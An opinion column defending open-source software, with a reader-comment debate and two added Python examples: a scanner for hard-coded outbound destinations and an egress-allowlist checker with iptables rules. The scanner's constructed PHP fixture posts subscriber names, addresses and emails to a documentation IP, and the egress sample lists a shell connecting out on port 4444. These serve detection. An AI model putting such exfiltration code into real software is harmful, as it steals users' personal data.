In defence of open source

[By Jason Norwood-Young]

Late last year, I was asked to audit some software that had been developed overseas and bought by a large SA company to launch a new consumer website. It all looked pretty straightforward, until I noticed a strange line in the code: every time a new subscriber signed up, the software would forward this information to a mysterious IP address.

Clearly, someone working on the code had decided to do a bit of information mining. The combination of full name, address and e-mail of all the users of this site could be sold for a pretty penny to spammers. The site also accepted and processed credit card payments. Whoever engineered the malicious code had missed a golden opportunity — it would have been just as easy to steal credit card details, complete with expiry dates and security codes.

All the while, the customer would have had a false sense of security from the little lock in their browser. The lock only vouches for the encrypted session between the browser and the website; it says nothing about what the website’s own code does with the data once it arrives, and this “hack” did not interfere with that session at all.

There are two ways this potential theft could have been detected before the website went live. The first is fairly technically complex: set the site up in a controlled environment and examine all the information sent in and out of the system. That is time consuming, requires a fair amount of expertise, and gives no guarantee, because it only catches traffic that the test actually triggers. Code that forwards data only under particular conditions, or only after the site has been live for a while, would pass such a test untouched.

The second way is for someone to read the code, which is how we found the problem. For that to be possible, we needed “open-source” software: software where the code is there to be read and, in this case, edited. Not only could we detect the problem, we could fix it. The site still went live, without the security issue.

These are two reasons why, as an IT buyer, I lean towards open-source software. If there’s a problem, I can identify it and fix it. That doesn’t mean I audit every piece of software I run; there aren’t enough hours in the day. But I’ll often dive in and have a quick look around before committing to a piece of software. Poor coding style and obvious unnecessary outgoing connections should ring alarm bells.
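
The “quick look around” can be partly automated. The following scanner is an added example, not code from the original article: it walks source text, reports every literal IP address or URL that is not on an assumed allowlist, and notes when an outbound-network call (the PHP cURL and socket functions, here) sits on the same line. The allowlist, the function list and the PHP signup handler it runs over are all constructed for illustration, and 203.0.113.9 is a documentation address standing in for the “mysterious IP” in the story.

```python
"""Static scan for hard-coded outbound destinations in web application source.

Added example, not code from the original article. It flags source lines that
name a literal IP address or URL, notes whether an outbound-network call sits on
the same line, and ignores destinations on an assumed allowlist. The PHP snippet
at the bottom is constructed to resemble the signup handler the article describes.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# PHP functions that open outbound connections (extend for other languages).
OUTBOUND_CALLS = ("curl_init", "curl_setopt", "curl_exec", "file_get_contents",
                  "fsockopen", "stream_socket_client", "fopen", "mail")
IPV4_RE = re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])")
URL_RE = re.compile(r"[a-z][a-z0-9+.-]*://[^\s'\"<>]+", re.IGNORECASE)

# Assumed allowlist: destinations this application is expected to contact.
ALLOWED_HOSTS = {"payments.example.com", "smtp.example.com", "localhost"}
ALLOWED_NETS = (ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("127.0.0.0/8"))


@dataclass
class Finding:
    line_no: int
    destination: str
    outbound_call: Optional[str]  # outbound call on the same line, if any
    source_line: str


def destination_allowed(dest: str) -> bool:
    """True when dest is an allowlisted host name or an IP inside an allowed network."""
    try:
        ip = ipaddress.ip_address(dest)
    except ValueError:
        return dest.lower() in ALLOWED_HOSTS
    return any(ip in net for net in ALLOWED_NETS)


def literal_destinations(line: str) -> List[str]:
    """Return every host name or IP literal on a line: URL hosts first, then bare IPv4s."""
    dests = []
    for m in URL_RE.finditer(line):
        host = urlsplit(m.group(0)).hostname
        if host:
            dests.append(host)
    # Blank out the URLs so an IP inside one is not reported twice.
    remainder = URL_RE.sub(" ", line)
    for m in IPV4_RE.finditer(remainder):
        try:
            ipaddress.ip_address(m.group(0))
        except ValueError:
            continue  # e.g. a version string such as 1.2.3.456
        dests.append(m.group(0))
    return dests


def scan_source(text: str) -> List[Finding]:
    """Report every non-allowlisted literal destination, with the outbound call if present."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        call = next((c for c in OUTBOUND_CALLS if c + "(" in line), None)
        for dest in literal_destinations(line):
            if not destination_allowed(dest):
                findings.append(Finding(line_no, dest, call, line.strip()))
    return findings


# Constructed sample: a signup handler with one unexpected outbound call (line 7).
SAMPLE_PHP = """<?php
// Constructed sample for the scanner.
function register_subscriber($db, $name, $address, $email) {
    $stmt = $db->prepare("INSERT INTO subscribers (name, address, email) VALUES (?, ?, ?)");
    $stmt->execute([$name, $address, $email]);
    mail($email, "Welcome", "Thanks for subscribing");
    $ch = curl_init("http://203.0.113.9/collect.php");
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(compact('name', 'address', 'email')));
    curl_exec($ch);
    $gw = curl_init("https://payments.example.com/session");
    return $gw;
}
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_PHP):
        kind = "OUTBOUND CALL" if f.outbound_call else "LITERAL"
        print(f"line {f.line_no}: {kind} -> {f.destination}: {f.source_line}")
```

Run against the sample, it reports the single line that posts the subscriber details to 203.0.113.9 and stays quiet about the payment gateway, because that host is on the allowlist. The scanner is deliberately dumb: it will not see a destination assembled at runtime or decoded from a string, which is exactly why reading the surrounding code, rather than grepping alone, is still part of the job.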

Equally, it’s why I distrust proprietary software. I don’t know what it’s doing most of the time, and I assume the worst. I also don’t see the need to guard the software so closely.

An important element of open source is that it never gives up software copyright. All it does is give me permission to view, and usually edit, the source code. (You also get “free” open source but it’s not as socialist as the proprietary software companies would have us believe.)

Proprietary software is like buying a car that comes with the bonnet welded shut. To check your oil or water levels would require a trip to the manufacturer, and a fee to go with it. Their biggest concern is that, should I see the engine, I would immediately go and create my own car from scratch.

Even though I can open my car’s bonnet, I really haven’t the first clue what most of the stuff does. I don’t have the expertise, skill or inclination to attempt to recreate a car. I trust that my car manufacturer knows how to build an engine, and car, better than I can.

Likewise, I assume that Microsoft or Apple know a lot more about building operating systems than I do. And yet they insist that the bonnet be welded shut.

I use the Apache Web server extensively, and it is open source. I can see how they built it and make my own Web server, but I’m not going to. Apache dominates the Internet, used on more than 60% of the top servers (and rising), compared to Microsoft’s 17% (and dropping). (See Netcraft for the latest figures.)

In the cloud
Those who don’t see the relation between the Internet and enterprise software will not like the next five years. There’s a shift to using Internet technologies such as Flash and HTML5 for enterprise applications, and simply outsourcing large portions of traditional infrastructure to the Web.

Though a lot can be pushed to the ever-growing Internet cloud, if a specific software project is a core competitive advantage, companies will probably still keep it in house. But if you’re still building your internal apps as desktop apps in some obscure language, or as client-server apps in Java, you’re heading for trouble. The cost of finding skills to support these apps will steadily grow, while your competitors that have moved to more open technologies and languages, such as PHP or Python, will see their skills costs reducing as they can use the biggest pool of developers. The emergence of JavaScript as a serious language is adding impetus to this movement, and it’s probably the wisest place to invest in training and skills.

The great thing about PHP, Python and JavaScript is they all lend themselves to an open-source environment. This in turn gives companies much more security in their code investments, and the skills to audit their software suppliers’ code — provided, of course, that they ship their code without the bonnet welded shut.

  • Jason Norwood-Young is CEO of 10Layer, building the tools news publishers use to publish. A recovering journalist still struggling with geekiness, he’s also been technical manager at the Mail & Guardian Online, technology editor at ITWeb and deputy editor at Stuff magazine.

  • http://twitter.com/rmaclean Robert MacLean

    1) “The first would have been fairly technically complex. We could have set the site up in a controlled environment and examined all the information sent in and out of the system. It would have been time consuming in the extreme, have required a great deal of technical expertise and would not have been 100% guaranteed.”
    You mean like the fairly simple set-up of a firewall and monitoring of traffic that is done daily by millions of companies? Really, you think that is complex, time consuming (more than reading code) and requires a great deal of skill? I think that just shows us that you don’t understand networking.
    2) “These are two reasons that as an IT buyer I lean towards open-source software. If there’s a problem, I can identify it and fix it.”
    That ASSUMES people read and validate open source code. It has long been proven that on anything but the largest projects people are not doing that – mostly because it is boring and lacks glamour which they could get from implementing new features.
    You could argue the burden is with the companies to check what they use, but that increases costs and time when you could be using proprietary software that has been audited and checked properly, but that means you trust the development company. So either you trust that people you have never met, who have no legal reason to, will have checked, or you trust that a company which has a legal requirement to do it has checked, but with possibly no way for you to check on them. By using software you are giving trust to someone; it is a trade-off between who that is vs. trusting no one and spending time/money to do it yourself. There is no perfect answer.
    3) “And yet they insist that the bonnet be welded shut.”
    Can’t say for Apple, but for Microsoft most of their code is available. For example .NET is open source and freely available. For Windows, the source code can be requested; there are some documents to complete and NDAs, but the code is there if you wish to audit it – and people like the American DOJ do that.
    4) “There’s a shift to using Internet technologies such as Flash”
    I would say that there is a shift away from Flash to things like HTML for consumer-based internet solutions. In the corporate space (i.e. within companies) I do not see a huge shift yet to or away from any technologies; this is expected as corporates move slower than consumers.
    5) “The cost of finding skills to support these apps will steadily grow, while your competitors that have moved to more open technologies and languages, such as PHP or Python, will see their skills costs reducing as they can use the biggest pool of developers. The emergence of JavaScript as a serious language is adding impetus to this movement, and it’s probably the wisest place to invest in training and skills.”
    Very big jump from open source giving advantages to security and trust, to somehow there being more developers investing in certain technologies. You provided good stats to back up your IIS vs. Apache comment; where is the proof for this one?
    In addition nothing in PHP or Python will make you open source – open source is about a commitment on a business level not a technology one. You can have a very closed source solution on top of those technologies, for example Facebook’s system is built on top of PHP but you can’t get the code for that.
    Finally I would say that developer skills + the quality of tools available will define cost. PHP & Python are seriously lagging behind mature frameworks and toolsets that languages like C# & Java have and it is the total cost of ownership (TCO) that is a valid measure… not just the fact open source developers using aging web technologies may be cheaper to staff.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    Standard open source fanboy fare.   Bottom line: only use software from vendors you trust.  Whether it’s open or closed source is personal preference, and has very little merit in a solution.

    The Netcraft stats are pretty much universally dismissed as domain parking stats; they’re not relevant when comparing market shares. In the real world, MS Server is eating away at Linux’s market share, and rightly so – it’s going from strength to strength.

    Robert: agreed re: point 1… i also thought “WTF?”

  • Anonymous

    So… disclose the software supplier!

  • http://twitter.com/EventsZA EventsZA

    Hmm, “Fanboy Fare”, if that is what the author’s article is, then so is your comment. As to traffic monitoring, that’s like trying to lock the door after the horse has bolted. Although, do use it, once you discover there’s a problem you can do something about it. Similarly by auditing the software code, a potential issue was discovered BEFORE it could become a security exploit.

  • http://twitter.com/waynegemmell Wayne Gemmell

    The most important justification for open source in my books anyway is that it is a HUGE enabler of the little guy. You can start a business with very little capital and a lot of spare time and potentially churn out a google or twitter.

  • http://twitter.com/hendra Hendra

    I would think that setting it up in a controlled environment and monitoring the traffic is easier than going through the seemingly endless lines of code, no?

  • http://twitter.com/stevesong Steve Song

    It is a shame that these debates quickly become so polarised.  In truth, any software ecosystem benefits from both open and closed software.  Apple got a huge leg up from the open platform that it is built on and Ubuntu in turn got a design leg up from Apple’s lovely UI design.  Getting rid of proprietary software would be like the church getting rid of the devil.  It turns out to be, pardon the pun, a necessary evil.  :-)

    More interesting is thinking about what benefits most from being open, and that is definitely the tools for creating things. Programming languages, frameworks, development tools, and web servers benefit everyone when they are open. Keeping the tools open lowers the bar for creation and innovation. It lets us all, rich and poor, stand on the shoulders of giants.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    >>Hmm, “Fanboy Fare”, if that is what the author’s article is, then so is your comment.

    How so?  I simply said open/closed is largely irrelevant, unless I’m a fanboy of software in general, both open and closed?
    >> As to traffic monitoring, that’s like trying to lock the door after the horse has bolted.

    Not sure what this means. 

    >>Similarly by auditing the software code, a potential issue was discovered BEFORE it could become a security exploit.     

    The result was not under question, the idea of setting up an environment in a VM and setting a packet sniffer on it being “technically complex”.  In fact, they should do this anyway, as reading hundreds of thousands of lines of code you could easily miss an obfuscated vulnerability.  It *gasp* even happens in open source software from time to time.

    PHP and many common packages built on it are notoriously vulnerable.  But I won’t say that makes open source suck, the same rules apply to both open and closed source – make sure you have a 2nd line of defence with network security, and keep your software packages up to date and patched!

  • Me

    In fact, a firewall configuration that blocks outgoing connections (ones started from the server) is a must in production, not only for testing. You only authorise the outgoing connections needed for the normal functioning of the server (email notifications, etc.) and forbid the rest. This would avoid many problems, like the one you described, or an attacker downloading a toolkit to escalate privileges once he has non-root access to the system, etc.
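
The egress allowlist the commenter above describes, and the controlled-environment traffic check the article mentions, can share one policy. The following is an added example (not the commenter’s code, nor the article’s): it models the handful of outbound connections a web server legitimately needs, checks a constructed sample of observed connections against that policy, and renders the same policy as a default-deny iptables OUTPUT chain. The hosts, networks, ports and the one-line record format are assumptions for illustration.

```python
"""Egress allowlist for a production web server: check observed outbound
connections against a policy and render that policy as default-deny firewall rules.

Added example, not code from the article or the comment above. The policy, hosts,
networks and the one-line connection record format are assumptions made for
illustration; the sample records are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Rule:
    dest: ipaddress.IPv4Network
    proto: str   # "tcp" or "udp"
    port: int
    purpose: str


# Assumed policy: the only outbound connections this web server needs to start.
POLICY = [
    Rule(ipaddress.ip_network("10.0.1.20/32"), "tcp", 3306, "database"),
    Rule(ipaddress.ip_network("10.0.1.25/32"), "tcp", 587, "mail relay for notifications"),
    Rule(ipaddress.ip_network("10.0.1.53/32"), "udp", 53, "internal DNS"),
    Rule(ipaddress.ip_network("198.51.100.0/24"), "tcp", 443, "payment gateway"),
]


@dataclass(frozen=True)
class Connection:
    proto: str
    dst_ip: str
    dst_port: int
    process: str


def parse_connection(record: str) -> Connection:
    """Parse a constructed record of the form 'proto dst_ip:dst_port process'."""
    proto, dst, process = record.split()
    ip, port = dst.rsplit(":", 1)
    return Connection(proto.lower(), ip, int(port), process)


def is_allowed(conn: Connection, policy: List[Rule] = POLICY) -> bool:
    """A connection is allowed only if some rule matches protocol, port and destination."""
    ip = ipaddress.ip_address(conn.dst_ip)
    return any(conn.proto == r.proto and conn.dst_port == r.port and ip in r.dest
               for r in policy)


def violations(records: List[str], policy: List[Rule] = POLICY) -> List[Connection]:
    """Connections in the records that the policy would not permit."""
    return [c for c in map(parse_connection, records) if not is_allowed(c, policy)]


def egress_rules(policy: List[Rule] = POLICY) -> List[str]:
    """Render the policy as an iptables OUTPUT chain with a default DROP.

    Replies on connections that clients opened to the server are ESTABLISHED
    from conntrack's point of view, so the server keeps serving; only
    connections the server itself initiates are subject to the allowlist.
    """
    rules = [
        "iptables -P OUTPUT DROP",
        "iptables -A OUTPUT -o lo -j ACCEPT",
        "iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT",
    ]
    for r in policy:
        rules.append(f"iptables -A OUTPUT -p {r.proto} -d {r.dest.with_prefixlen} "
                     f"--dport {r.port} -j ACCEPT  # {r.purpose}")
    return rules


# Constructed sample of connections the web server was seen initiating.
SAMPLE_RECORDS = [
    "tcp 10.0.1.20:3306 php-fpm",
    "tcp 10.0.1.25:587 php-fpm",
    "udp 10.0.1.53:53 php-fpm",
    "tcp 198.51.100.14:443 php-fpm",
    "tcp 203.0.113.9:80 php-fpm",   # the kind of forwarding the article describes
    "tcp 192.0.2.77:4444 sh",       # an unexpected process reaching out
]

if __name__ == "__main__":
    for c in violations(SAMPLE_RECORDS):
        print(f"VIOLATION {c.process}: {c.proto} -> {c.dst_ip}:{c.dst_port}")
    print("\n".join(egress_rules()))
```

Two of the sample connections are reported: the post to 203.0.113.9 that the article’s code would have made, and a shell reaching out on port 4444. The rendered rules would drop both at the first packet, since a new outbound connection is NEW rather than ESTABLISHED until it is accepted, while inbound client sessions and the four allowlisted destinations keep working.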

  • http://twitter.com/rmaclean Robert MacLean

    I think this is very team specific. I previously was part of a start-up that did it all on open source, not for the open-source side but the licensing aspect. We had the time & skill to work with it. If I were to do it now, I would likely sign up for something like Microsoft BizSpark – get the software for free (or at least cheaper) and work in the area where my skill is now, as trying to remember some of that Perl & PHP we wrote should never be attempted ;)

  • http://twitter.com/rmaclean Robert MacLean

    I think you are merging two distinct ideas here.

    1) Could a large software vendor use the obscurity of closed source to spy on us?

    Possibly, but closed source doesn’t prevent things like network traffic being monitored or blocked. The Microsoft Windows activation system you point to does not ‘dial home’ in a corporate environment, only in the home environment – why? Because corporates have activation servers. Easy to spot when a machine is trying to ‘dial home’ and shouldn’t be in that case. In addition, Windows source code has been looked at by many people outside of Microsoft as part of security & government requirements and can be requested by individuals, like you, with the proper motivational documents and proof you are not going to leak it to slashdot.

    2) Could government spy on us?

    Sure, but there are easier ways than bribing every OS developer out there to insert it or making their own OS. Why not just erect a firewall like China has and control and monitor that way?

    Interesting that you seem to think a real issue like the secrecy bill is less important than a theoretical issue like govt. spyware.

  • Anonymous

    I agree with Robert. There are some best-of-breed technologies available for free to startups from Microsoft (gasp!). Write your code in C# and you’ve built your software on a modern, growing technology, have access to a pool of skilled, talented professionals and have a large multinational software company as a partner.

  • Andrew Rens

    Robert, you have misread what I was saying so badly that it seems better to credit you with the intelligence to have done so deliberately. What exactly is your relationship to Microsoft?

    I never suggested that the South African government would use software to spy on its citizens. Nor did I say that the secrecy bill wasn’t important, I’ve already said in interviews and articles that it is a mistake.

    Instead what I said was that if government is concerned about keeping certain information, then instead of trying to pass the draconian secrecy bill government should take a look at the proprietary software that is currently used by government. In some cases it is not a question of whether that software might contain spyware or not; for example some Microsoft products are publicly known to include spyware that searches for alleged copyright violations and reports back to Redmond. What information it actually sends isn’t known because the code is closed. Foreign proprietary software vendors have loyalty to the countries where they are based, where their directors live, and where their profits are enjoyed. There are many incentives for such foreign companies to pass sensitive South African government information on to their own governments. How is that not a security threat?

    As I said, that is a far more real threat than the threats government imagined when it conjured up the secrecy bill.

    You say that “In addition Windows source code has been looked at by many people outside of Microsoft as part of security & government requirements and can be requested by individuals, like you, with the proper motivational documents and proof you not going to leak it to slashdot.”

    So instead of open source which anyone can look at any time you suggest that we trust code when people can’t look at the working code itself but must take the word of “experts” who have seen something that they have been told is the code and only asking pretty please and signing an NDA.

    It’s simpler to just use open source.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    >> we trust code when people can’t look at the working code itself but must take the word of “experts”

    I assume you use an open-source browser.  Do you compile each update from the source yourself?  How do you know the code you’re running isn’t contaminated with secret backdoors, and is indeed a compile of the freely available source?  And if someone else has, and posts in a blog it’s safe, how can you take the word of these “experts”?

    I do quite a lot of traffic sniffing when debugging stuff, and Chrome does a LOT of encrypted chatter to “safebrowsing-cache.google.com” … they TELL us it’s a url blacklist to protect you and point to an open spec, but I haven’t inspected the source code myself and compiled it into my own binary, so I can’t be sure.  It could all be a massive collaboration with the US Government to, as you say, send ” data on its activities to the subject of another sovereign nation”

    Conspiracy theories work both ways, dude.  The “oh but the source is available” is about as strong an argument as “torrents are used to download linux ISOs” … not many people compile everything from source, they download binaries.  That’s where the argument falls apart.

    I assume you’re not a big cloud fan?  That takes this to a whole new level.   The closed-ness of it must make your skin crawl.
